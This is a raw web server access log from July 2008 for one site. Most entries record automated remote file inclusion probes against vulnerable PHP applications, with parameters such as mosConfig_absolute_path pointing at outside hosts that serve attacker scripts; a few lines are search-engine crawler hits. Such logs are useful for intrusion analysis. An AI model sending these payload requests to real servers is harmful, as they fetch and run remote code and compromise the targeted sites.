89.111.176.28 - - [24/Jul/2008:08:01:25 -0700] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.28 - - [24/Jul/2008:08:01:43 -0700] "GET /logs/access_080128.log/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.236.180.77 - - [24/Jul/2008:08:03:04 -0700] "GET /phphtml.php?htmlclass_path=http://geocities.com/q.dhie/scan/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
211.236.180.77 - - [24/Jul/2008:08:03:04 -0700] "GET /logs/phphtml.php?htmlclass_path=http://geocities.com/q.dhie/scan/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
98.129.33.59 - - [24/Jul/2008:08:03:06 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.129.33.59 - - [24/Jul/2008:08:03:06 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.129.33.59 - - [24/Jul/2008:08:03:07 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.67.80 - - [24/Jul/2008:08:03:17 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0112.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" "dmulk.com"
81.169.158.65 - - [24/Jul/2008:08:05:33 -0700] "GET /logs/access_080225.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.kke.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.65 - - [24/Jul/2008:08:05:34 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.kke.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:06:41 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:06:41 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:06:41 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:06:41 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:06:41 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:06:42 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:06:42 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:06:42 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:06:42 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:06:42 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:06:42 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:06:42 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:06:42 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:06:42 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:06:42 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.207.244 - - [24/Jul/2008:08:07:50 -0700] "GET /logs/access_080418.log//index.php?option=com_expose&Itemid=&mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
151.1.32.20 - - [24/Jul/2008:08:07:55 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://home.bellavillapattaya.com/modul/mic.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
85.17.207.244 - - [24/Jul/2008:08:07:55 -0700] "GET //index.php?option=com_expose&Itemid=&mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 200 18545 "-" "libwww-perl/5.812" "www.dmulk.com"
151.1.32.20 - - [24/Jul/2008:08:07:55 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://home.bellavillapattaya.com/modul/mic.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
85.17.207.244 - - [24/Jul/2008:08:07:56 -0700] "GET /logs//index.php?option=com_expose&Itemid=&mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.106.102.20 - - [24/Jul/2008:08:08:24 -0700] "GET /logs/access.log/errors.php?error=http://www.geocities.com/fjr1938/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.102.20 - - [24/Jul/2008:08:08:25 -0700] "GET /errors.php?error=http://www.geocities.com/fjr1938/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.102.20 - - [24/Jul/2008:08:08:25 -0700] "GET /logs/errors.php?error=http://www.geocities.com/fjr1938/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.247.139.189 - - [24/Jul/2008:08:08:32 -0700] "GET /logs/access_080329.log/errors.php?error=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.247.139.189 - - [24/Jul/2008:08:08:32 -0700] "GET /errors.php?error=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.247.139.189 - - [24/Jul/2008:08:08:32 -0700] "GET /logs/errors.php?error=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
88.84.151.157 - - [24/Jul/2008:08:08:41 -0700] "GET /logs//poc.php?sourcedir=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.151.157 - - [24/Jul/2008:08:08:42 -0700] "GET //poc.php?sourcedir=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.129.33.59 - - [24/Jul/2008:08:09:03 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.129.33.59 - - [24/Jul/2008:08:09:03 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.129.33.59 - - [24/Jul/2008:08:09:03 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [24/Jul/2008:08:09:03 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=ftp://212.11.127.86/tmp/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [24/Jul/2008:08:09:10 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=ftp://212.11.127.86/tmp/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [24/Jul/2008:08:09:12 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=ftp://212.11.127.86/tmp/trem/old? HTTP/1.1" 200 18501 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.207.244 - - [24/Jul/2008:08:09:16 -0700] "GET /logs/access_080219.log//index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.114.135.126 - - [24/Jul/2008:08:09:18 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=ftp://212.11.127.86/tmp/trem/1? HTTP/1.1" 200 18497 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.28 - - [24/Jul/2008:08:09:49 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
148.202.29.8 - - [24/Jul/2008:08:10:34 -0700] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
148.202.29.8 - - [24/Jul/2008:08:10:35 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
148.202.29.8 - - [24/Jul/2008:08:10:35 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.220.215.216 - - [24/Jul/2008:08:11:13 -0700] "GET /logs//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.secondlive24.de/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.220.215.216 - - [24/Jul/2008:08:11:14 -0700] "GET //index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.secondlive24.de/help/sql.txt? HTTP/1.1" 200 18507 "-" "libwww-perl/5.812" "www.dmulk.com"
81.169.158.65 - - [24/Jul/2008:08:11:22 -0700] "GET /logs/access_080329.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.kke.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.240.146 - - [24/Jul/2008:08:11:41 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.destarre.be/language/t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
74.53.240.146 - - [24/Jul/2008:08:11:42 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.destarre.be/language/t.txt??? HTTP/1.1" 200 18427 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
85.17.207.244 - - [24/Jul/2008:08:11:42 -0700] "GET /logs/access_080322.log//index.php?option=com_expose&Itemid=&mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.6.18.246 - - [24/Jul/2008:08:11:44 -0700] "GET /bikes/dteel/EQ2/?N=D HTTP/1.0" 200 825 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.106.102.20 - - [24/Jul/2008:08:12:11 -0700] "GET /errors.php?error=http://www.geocities.com/fjr1938/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:12:29 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:12:32 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:12:33 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:12:35 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:12:36 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:12:36 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:12:36 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:12:36 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:12:36 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:12:36 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:12:37 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:12:37 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:12:38 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:12:39 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:12:39 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.247.139.189 - - [24/Jul/2008:08:12:58 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://163.26.12.232/aDu/alls.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.90.77.43 - - [24/Jul/2008:08:13:00 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.destarre.be/language/t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
209.90.77.43 - - [24/Jul/2008:08:13:02 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.destarre.be/language/t.txt??? HTTP/1.1" 200 18427 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
148.202.29.8 - - [24/Jul/2008:08:13:15 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.247.139.189 - - [24/Jul/2008:08:14:11 -0700] "GET /logs/access.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://163.26.12.232/aDu/alls.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.247.139.189 - - [24/Jul/2008:08:14:11 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://163.26.12.232/aDu/alls.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.247.139.189 - - [24/Jul/2008:08:14:12 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://163.26.12.232/aDu/alls.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.51.219.170 - - [24/Jul/2008:08:15:16 -0700] "GET /logs/access.log/errors.php?error=http://www.foolishmovies.helloweb.eu/fastidio_id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.219.170 - - [24/Jul/2008:08:15:16 -0700] "GET /errors.php?error=http://www.foolishmovies.helloweb.eu/fastidio_id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.84.151.157 - - [24/Jul/2008:08:15:16 -0700] "GET /logs/access_080118.log//aedating4CMS.php?dir[inc]=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.51.219.170 - - [24/Jul/2008:08:15:16 -0700] "GET /logs/errors.php?error=http://www.foolishmovies.helloweb.eu/fastidio_id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.84.151.157 - - [24/Jul/2008:08:15:16 -0700] "GET //aedating4CMS.php?dir[inc]=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.151.157 - - [24/Jul/2008:08:15:17 -0700] "GET /logs//aedating4CMS.php?dir[inc]=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
148.202.29.8 - - [24/Jul/2008:08:16:09 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
148.202.29.8 - - [24/Jul/2008:08:16:16 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.151.157 - - [24/Jul/2008:08:16:38 -0700] "GET /logs/access_080110.log//admin/frontpage_right.php?loadadminpage=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.151.157 - - [24/Jul/2008:08:16:38 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.151.157 - - [24/Jul/2008:08:16:39 -0700] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.188 - - [24/Jul/2008:08:17:03 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
203.22.204.188 - - [24/Jul/2008:08:17:03 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
82.78.216.197 - - [24/Jul/2008:08:17:07 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
82.78.216.197 - - [24/Jul/2008:08:17:08 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
211.236.180.77 - - [24/Jul/2008:08:17:18 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://geocities.com/q.dhie/scan/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
211.236.180.77 - - [24/Jul/2008:08:17:18 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://geocities.com/q.dhie/scan/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
203.22.204.188 - - [24/Jul/2008:08:17:33 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [24/Jul/2008:08:17:34 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [24/Jul/2008:08:17:34 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.139.189 - - [24/Jul/2008:08:17:57 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://163.26.12.232/aDu/alls.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
88.84.151.157 - - [24/Jul/2008:08:18:07 -0700] "GET /logs/access_071225.log//admin/frontpage_right.php?loadadminpage=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.78.216.197 - - [24/Jul/2008:08:18:10 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
151.1.32.20 - - [24/Jul/2008:08:18:11 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://home.bellavillapattaya.com/modul/mic.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.78.216.197 - - [24/Jul/2008:08:18:11 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
151.1.32.20 - - [24/Jul/2008:08:18:11 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://home.bellavillapattaya.com/modul/mic.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.78.216.197 - - [24/Jul/2008:08:18:12 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.169.158.65 - - [24/Jul/2008:08:18:52 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kke.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.65 - - [24/Jul/2008:08:18:52 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kke.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.247.139.189 - - [24/Jul/2008:08:19:01 -0700] "GET /errors.php?error=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.176.28 - - [24/Jul/2008:08:19:09 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.215.79.214 - - [24/Jul/2008:08:19:11 -0700] "GET /logs/access_080103.log//modules/xfsection/modify.php?dir_module=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.215.79.214 - - [24/Jul/2008:08:19:12 -0700] "GET //modules/xfsection/modify.php?dir_module=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
